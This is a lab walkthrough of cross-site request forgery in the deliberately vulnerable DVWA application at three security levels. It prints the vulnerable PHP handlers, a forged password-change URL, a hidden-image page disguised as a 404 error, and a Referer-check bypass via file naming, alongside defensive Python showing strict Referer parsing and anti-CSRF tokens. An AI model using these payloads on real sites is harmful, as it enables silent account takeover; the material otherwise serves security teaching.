Learning CSRF with DVWA
CSRF attack process and analysis
Low level
First, capture the password-change request to see what the form actually transmits.
The URL turns out to be:
http://<user's IP>/DVWA-1.9/vulnerabilities/csrf/?password_new=<new password>&password_conf=<confirmed password>&Change=Change#
While user A is logged in to the site, user A only has to click a URL carefully crafted by attacker B for the CSRF attack to succeed; the browser attaches A's session cookie to the request automatically.
Constructed link: http://192.168.244.131/DVWA-1.9/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change#
The Low-level source code is as follows:
<?php
if( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];
    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = mysql_real_escape_string( $pass_new );
        $pass_new = md5( $pass_new );
        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' );
        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }
    mysql_close();
}
?>
The source above performs no filtering or validation of where the request came from, so it has effectively no CSRF protection: any GET request carrying the victim's session cookie changes the password.
Of course, this URL is far too obvious; anyone with a little knowledge can see that it is a password-change link, so we should think about ways of hiding it, for example by constructing an HTML document.
The document is as follows:
Test.html
<img src="http://192.168.244.131/DVWA-1.9/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change#" border="0" style="display:none;"/>
<h1>404</h1>
<h2>file not found.</h2>
Here style="display:none;" keeps the image element from being displayed.
When the user opens this HTML page, they assume it is an error page and generally pay no attention, yet by then the browser has already requested the hidden image URL and the user's password has been changed.
Logging in with the old password now fails.
Trying again with the changed password:
Login succeeds.
Medium CSRF
Likewise, we first capture the password-change request to see what is different.
Look at its source:
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Checks to see where the request came from
if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) ) {
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = mysql_real_escape_string( $pass_new );
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
}
else {
// Didn't come from a trusted source
echo "<pre>That request didn't look correct.</pre>";
}
mysql_close();
}
?>
The source now contains one extra comparison: if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) )
It matches the server's host name against the Referer header: when the host name appears in the referrer of the request, the password change goes ahead. Note that eregi is a case-insensitive substring match over the whole Referer value, not a comparison of the Referer's host component, so any referring URL that merely contains the host name string is accepted.
So we can construct an HTML page whose file name contains the host name. The DVWA host's IP address is 192.168.244.131.
192.168.244.131.html (this page needs to be placed on the attacker's server)
Its content is as follows:
<img src="http://192.168.244.131/DVWA-1.9/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#" border="0" style="display:none;"/>
<h1>404</h1>
<h2>file not found.</h2>
Here style="display:none;" keeps the image element from being displayed.
We place this file in the web root of the attacking host
and then open the file through the attacking host's web server, so the Referer of the image request becomes http://<attacking host>/192.168.244.131.html, which contains the DVWA host name.
When the user then tries to log in with the password "password", the login no longer works.
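To make the weakness of the Medium-level check concrete, the following is an added example (not DVWA's own code) that mirrors the eregi( SERVER_NAME, HTTP_REFERER ) substring test in Python and places it beside a stricter check that parses the Referer and compares only its host component. The server name and the sample Referer values are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit

# Constructed value for the demonstration: the DVWA host from the walkthrough.
SERVER_NAME = "192.168.244.131"


def medium_referer_check(server_name: str, referer: str) -> bool:
    """Mirror of DVWA Medium's eregi( SERVER_NAME, HTTP_REFERER ):
    a case-insensitive regex search for the server name anywhere in the
    Referer string. As in eregi, the server name is used as a pattern, so
    the dots in it are regex metacharacters; that is kept here deliberately
    to reproduce the original behaviour."""
    if not referer:
        return False  # PHP: eregi() on an empty/missing Referer is false
    return re.search(server_name, referer, re.IGNORECASE) is not None


def strict_referer_check(server_name: str, referer: str) -> bool:
    """Hardened alternative: parse the Referer as a URL and require its host
    component to equal the expected server name exactly. A missing or
    unparsable Referer is rejected rather than trusted."""
    if not referer:
        return False
    try:
        parts = urlsplit(referer)
    except ValueError:
        return False
    return parts.scheme in ("http", "https") and parts.hostname == server_name.lower()


# Constructed Referer values covering the cases discussed on this page.
SAMPLE_REFERERS = {
    "same-site form": "http://192.168.244.131/DVWA-1.9/vulnerabilities/csrf/",
    "attacker page": "http://attacker.example/index.html",
    "attacker page named after the target": "http://attacker.example/192.168.244.131.html",
    "no referer": "",
}


def evaluate(server_name: str = SERVER_NAME) -> dict:
    """Run both checks over every sample Referer.
    Returns {label: (medium_result, strict_result)}."""
    return {
        label: (medium_referer_check(server_name, ref), strict_referer_check(server_name, ref))
        for label, ref in SAMPLE_REFERERS.items()
    }


if __name__ == "__main__":
    for label, (medium, strict) in evaluate().items():
        print(f"{label:40s} medium={medium!s:5s} strict={strict}")
```

Running the block shows the substring check accepting the page whose file name contains the host name while the host-component comparison rejects it. Even the strict variant is only a defence in depth: browsers may omit the Referer entirely (privacy settings, Referrer-Policy), which is why the High level below moves to a per-session token instead.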
High CSRF
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = mysql_real_escape_string( $pass_new );
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
mysql_close();
}
// Generate Anti-CSRF token
generateSessionToken();
?>
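The High level replaces the Referer test with an anti-CSRF token: generateSessionToken() stores a random value in the session and emits it in the form, and checkToken() refuses the request unless the submitted user_token equals the stored session_token. The following is an added example (not DVWA's own code, and written in Python rather than PHP) of the same flow. The function names, the in-memory session and "database" dictionaries, and the sample requests are all assumptions made for the demonstration; DVWA's real checkToken() redirects to index.php on failure, whereas this version returns a message so the outcome can be inspected.

```python
import hashlib
import hmac
import secrets

TOKEN_BYTES = 32  # 256 bits of randomness per token


def generate_session_token(session: dict) -> str:
    """Counterpart of generateSessionToken(): mint a fresh unpredictable token,
    store it server-side in the session and return it so the page can embed it
    in the password-change form as a hidden user_token field."""
    token = secrets.token_hex(TOKEN_BYTES)
    session["session_token"] = token
    return token


def check_token(submitted, session: dict) -> bool:
    """Counterpart of checkToken(): accept only if the session holds a token and
    the submitted value equals it. The comparison is constant-time so the
    response timing does not leak how many leading characters matched."""
    expected = session.get("session_token")
    if not expected or not isinstance(submitted, str):
        return False
    return hmac.compare_digest(submitted.encode("utf-8"), expected.encode("utf-8"))


def hash_password(password: str) -> str:
    """Stand-in for DVWA's md5(); a real application should use a dedicated
    password hash such as bcrypt or Argon2, but that is outside this example."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def handle_change_password(session: dict, params: dict, db: dict) -> str:
    """Request handler mirroring the High-level order of operations:
    token check first, then password confirmation, then the update.
    `params` stands in for $_GET / $_REQUEST, `db` for the users table."""
    if not check_token(params.get("user_token"), session):
        return "CSRF token is incorrect"
    pass_new = params.get("password_new", "")
    if pass_new != params.get("password_conf"):
        return "Passwords did not match."
    db[session["user"]] = hash_password(pass_new)
    # Rotate the token after a successful use so a captured token cannot be replayed.
    generate_session_token(session)
    return "Password Changed."


def demo() -> tuple:
    """Three constructed requests against one logged-in session:
    a forged request without a token (what the hidden <img> URL on this page
    produces), a legitimate form submission carrying the token, and a replay
    of that same token after it has been rotated."""
    session = {"user": "admin"}
    db = {}
    token = generate_session_token(session)
    forged = handle_change_password(
        session, {"password_new": "123", "password_conf": "123"}, db)
    legit = handle_change_password(
        session, {"password_new": "123", "password_conf": "123", "user_token": token}, db)
    replay = handle_change_password(
        session, {"password_new": "456", "password_conf": "456", "user_token": token}, db)
    return forged, legit, replay, db


if __name__ == "__main__":
    forged, legit, replay, db = demo()
    print("forged :", forged)
    print("legit  :", legit)
    print("replay :", replay)
```

The forged request fails because an attacker's page cannot read the victim's session token: the token travels in the form body of the same-site page, not in a cookie the browser would attach automatically, which is exactly the property the Low and Medium levels lacked.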